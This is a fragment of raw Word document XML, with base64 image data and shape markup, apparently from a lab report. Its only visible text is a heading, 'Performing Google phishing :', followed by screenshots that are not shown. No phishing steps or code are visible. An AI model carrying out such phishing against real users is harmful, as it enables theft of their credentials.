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POR3rZcE&#10;AABMFQAADgAAAAAAAAAAAAAAAAA9AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEAwvF0&#10;9fddAQD3XQEAFAAAAAAAAAAAAAAAAAAABwAAZHJzL21lZGlhL2ltYWdlMS5qcGdQSwECLQAKAAAA&#10;AAAAACEAGLhO2I9cAQCPXAEAFAAAAAAAAAAAAAAAAAApZQEAZHJzL21lZGlhL2ltYWdlMi5qcGdQ&#10;SwECLQAUAAYACAAAACEAz8vI0N0AAAAGAQAADwAAAAAAAAAAAAAAAADqwQIAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAHvAOJLDAAAApQEAABkAAAAAAAAAAAAAAAAA9MICAGRycy9fcmVs&#10;cy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAcABwC+AQAA7sMCAAAA&#10;">
                <v:rect id="Rectangle 6430" o:spid="_x0000_s1387" style="position:absolute;left:59448;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22wwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L/ocwgjdNXUW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ZkfNtsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="36D123E1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6431" o:spid="_x0000_s1388" style="position:absolute;left:59448;top:66077;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14:paraId="72010E8C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6432" o:spid="_x0000_s1389" style="position:absolute;top:67727;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3D3B0B7D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 6433" o:spid="_x0000_s1390" style="position:absolute;top:6975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14:paraId="056A49F4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 6437" o:spid="_x0000_s1391" type="#_x0000_t75" style="position:absolute;left:383;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u8oxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvgt8hPKE3zdo/rqxGKdpSr1oLentsnsni5mXZpLp+e1MoeBxm5jfMfNm5WlyoDZVnBeNRBoK4&#10;9Lpio2D//TmcgggRWWPtmRTcKMBy0e/NsdD+ylu67KIRCcKhQAU2xqaQMpSWHIaRb4iTd/Ktw5hk&#10;a6Ru8ZrgrpbPWTaRDitOCxYbWlkqz7tfp2C95uM+/7GH8QcdvsrzyrxtcqPU06B7n4GI1MVH+L+9&#10;0Qomry85/L1JT0Au7gAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA1Fu8oxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                  <v:imagedata r:id="rId140" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6438" o:spid="_x0000_s1392" style="position:absolute;left:256;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6GvgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/JCsIw&#10;EL0L/kMYwZumLohUo4gbHt1AvA3N2BabSWmirX9vDoLHx9vny8YU4k2Vyy0rGPQjEMSJ1TmnCq6X&#10;XW8KwnlkjYVlUvAhB8tFuzXHWNuaT/Q++1SEEHYxKsi8L2MpXZKRQde3JXHgHrYy6AOsUqkrrEO4&#10;KeQwiibSYM6hIcOS1hklz/PLKNjWw5u/H/fP6eBhdTlONzw6XpTqdprVDISnxv/FP/dBK5iMR2Fu&#10;eBOegFx8AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAAAAAA&#10;AAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABY9joa+AAAA3QAAAA8AAAAAAAAA&#10;AAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAADyAgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <v:shape id="Picture 6440" o:spid="_x0000_s1393" type="#_x0000_t75" style="position:absolute;left:383;top:33845;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tuwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P/B/CE7zN1Fnq6JqKDASRXdbt4PEteWuKzUtpotb/3hwGO358v6vt5HpxpTF0nhWslhkIYu1N&#10;x62C76/98yuIEJEN9p5JwZ0CbOvZU4Wl8Tf+pGsTW5FCOJSowMY4lFIGbclhWPqBOHG/fnQYExxb&#10;aUa8pXDXy5csK6TDjlODxYHeLelzc3EK8LA2PzYUw31z1Hl/Cnolmw+lFvNp9wYi0hT/xX/ug1FQ&#10;5Hnan96kJyDrBwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQApYwtuwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;">
                  <v:imagedata r:id="rId141" o:title=""/>
                </v:shape>
                <v:shape id="Shape 6441" o:spid="_x0000_s1394" style="position:absolute;left:256;top:33718;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RmxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6iY2hBBdRWyVHlNTKN4e2WcSzL4N2dXEf98tFHocZuYbZr2dTCfuNLjWsoJ4EYEg&#10;rqxuuVbwVR5eMhDOI2vsLJOCBznYbmZPa8y1HfmT7idfiwBhl6OCxvs+l9JVDRl0C9sTB+9iB4M+&#10;yKGWesAxwE0nl1GUSoMth4UGe9o3VF1PN6PgfVx++3NxvGbxxeo+qd/4tSiVep5PuxUIT5P/D/+1&#10;P7SCNEli+H0TnoDc/AAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDfAVRmxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF91CD1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="378264C4" wp14:editId="20608A32">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="45352" name="Group 4535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00" name="Shape 501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1" name="Shape 501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02" name="Shape 501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3" name="Shape 501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04" name="Shape 501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52" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50105" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50106" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50107" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50108" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5010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35040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32A27595" wp14:editId="1D85B1AB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="45353" name="Group 4535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10" name="Shape 501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1" name="Shape 501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2" name="Shape 501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3" name="Shape 501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4" name="Shape 501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53" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 50115" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50116" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 50117" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50118" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 5011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r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED3694B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Performing Google </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>phishing :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7B6D9E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:left="40" w:right="-181"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CFDAD1D" wp14:editId="1AE6E9A9">
                <wp:extent cx="5961279" cy="3385588"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="44092" name="Group 44092"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5961279" cy="3385588"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5961279" cy="3385588"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6515" name="Rectangle 6515"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3236388"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="78A15583"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533" name="Picture 6533"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId142"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="12700"/>
                            <a:ext cx="5873750" cy="3295015"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6534" name="Shape 6534"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5899150" cy="3320415"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5899150" h="3320415">
                                <a:moveTo>
                                  <a:pt x="0" y="3320415"/>
                                </a:moveTo>
                                <a:lnTo>
